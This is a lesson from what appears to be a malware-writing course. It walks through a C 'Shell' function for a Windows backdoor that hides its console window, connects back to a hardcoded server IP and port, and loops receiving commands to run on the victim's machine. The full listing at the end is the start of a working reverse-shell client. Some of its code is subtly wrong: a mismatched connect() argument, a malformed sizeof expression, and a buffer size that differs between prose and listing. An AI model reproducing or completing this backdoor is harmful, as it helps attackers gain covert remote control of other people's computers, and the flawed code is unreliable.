---
title: Creating our shell function
course: code_malware
section: "Executing shell commands"
layout: lesson
---

As stated in the previous lesson, we will start working in our "Shell" function
which will receive a command from the server, execute it in the client and
return the output back to the server.

As you could see in the previous lesson, at the very end of the "_WinEntry_"
function, we called a function "Shell", function which we have not created yet.
So let's go to the beginning of the program right above the "**APIENTRY**
_WinMain_" function and the "_Shell_" function is going to be a void. What does
it mean? A "**void**" function means, that it will not return anything, for
example, if you code a function integer (**int**) it means, that the integer
function will return an int value, for example, one or zero. Add this to the
beginning of your code to define the "Shell" function:

```c
void Shell() {
}
```

Once the function "_Shell_" is defined, we will create three different variables
inside of it. The first one is going to be the buffer variable it is going to be
a char type variable and is going to contain "1024" bytes of memory, we are
going to use this variable to save the command from the server. Consider the
following scenario. We are running our server (keep in mind we have not coded
it yet) and we send the command to the target which is going to be for example
_Delete the 'homework.docx' file_, that command will be stored in the buffer
variable. The second variable we will need to define is the container variable,
I will call it container and that variable is also going to be char type and
will also allocate 1024 bytes of memory (the use of this variable will be
explained later). And the third variable we will need to define is
"_total_response_" which is also a char, but it will allocate "18384" bytes of
memory, it means that this variable is way more large than the previous two.
This is how our "_Shell_" function looks like so far:

```c
void Shell() {
  char buffer[1024];
  char container[1024];
  char total_response[18384];
}
```

Once we have defined those three variables, we are ready to define another loop
which will be executed for ever and will wait for incoming commands. To create
an inifnite loop, simply type:

```c
while (1) {
}
```

As we did in the "_WinMain_" function, we will also need to create a jump point
right before everything in our while loop.

```c
while (1) {
  jump:
    Code goes here
    ...
}
```

Now, what we are going to do, is to take the three variables we created and we
will allocate zeroes inside all of the memory that they take. For example, if
there are some random bytes in the 1024 bytes of memory that "_buffer_" takes,
we will set it all to zero. We already know that there is a function called
"_memset_" which we already used before, and this function takes three arguments
which is the variable name, the bytes we want to overwrite and the size we want
to overwrite. But we will not use this function, because we are would use it a
lot of times inside this program, let's create a smaller function that is going
to perform the same task.

We are going to create the "_bzero_" function, and for those who are wondering
"_bzero_" that is exactly the same as "_memset_", just that it is usable only on
linux, but as we are creating an application for Windows, we can't simply use
the "_bzero_" function and expect it to work, we need to define this function.
How can we define it? Inside of "_C_" we can use "_#define_", after that, we
type the name of the function (in this case "_bzero_"), open brackets and
specify what parameters are going to be needed. Our "_bzero_" function will take
two arguments, the first one will be the variable and the second one will be the
size. For example, if we want to zeroe the variable "_buffer_", we would execute
"_bzero(buffer, 1024)_". Defining the variable name and arguments are not the
only things we need to do, we also need to tell to the program how it should
work, how it can zeroe a memory section, we can port the arguments taken from
the "_bzero_" function to the "_memset_" function which will work in windows in
the same line, to do so, type the following:

```c
#define bzero(p, size) (void) memset((p), 0, (size))
```

Now that we have the "_bzero_" function in our program, so now we can use it in
our while loop so we can "_bzero_" all of the three variables previously
defined. Our while loop looks like this so far:

```c
while (1) {
  jump:
    bzero(buffer, sizeof(buffer));
    bzero(container, sizeof(container));
    bzero(total_response, sizeof(total_response));
}
```

So now let's see how we can use these variables. The first thing our program
needs to do is to receive the command of our server, how can we do that? we can
do it by using the "_recv_" (receive) function, this function takes four
  parameters, the first one is the socket we created, which we called "_sock_",
the second parameter is where the received data from the server will be stored,
in our case "_buffer_" the third parameter, is the size of the variable where we
are storing the received data, so it is going to be "_1024_" bytes, and the
fourth parameter will be zero, which specifies we are not passing any other
argument besides the three previous paramters. That entire line would look lilke
this:

```c
recv(sock, buffer, 1024, 0);
```

Now, when whe received the data sent by the server, we can enter our if/else
statements.

This is how our code looks so far:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <winuser.h>
#include <wininet.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

#define bzero(p, size) (void) memset((p), 0, (size))

int sock;

void Shell() {
  char buffer[1024];
  char container[1024];
  char total_response[1024];

  while(1) {
    jump:
    bzero(buffer, sizeof(buffer));
    bzero(container, sizeof(container));
    bzero(total_response, sizeof(total_response));

    recv(sock, buffer, 1024, 0);
  }
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow) {
  HWND stealth;
  AllocConsole();
  stealth = FindWindowA("ConsoleWindow", NULL);

  ShowWindow(stealth, 0);

  struct sockaddr_in ServAddr;
  unsigned short ServPort;
  char *ServIP;
  WSADATA wsaData;

  ServIP = "192.168.1.1";
  ServPort = 50005;

  if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0) {
    exit(1);
  }

  sock = socket(AF_INET, SOCK_STREAM, 0);

  memset(&ServAddr, 0, sizeof(ServAddr));
  ServAddr.sin_family = AF_INET;
  ServAddr.sin_addr.s_addr = inet_addr(ServIP);
  ServAddr.sin_port = htons(ServPort);

start:
  while (connect(socket, (struct sockaddr *) &ServAddr, sizeof(ServAddr != 0))) {
    Sleep(10);
    goto start;
  }
}
```
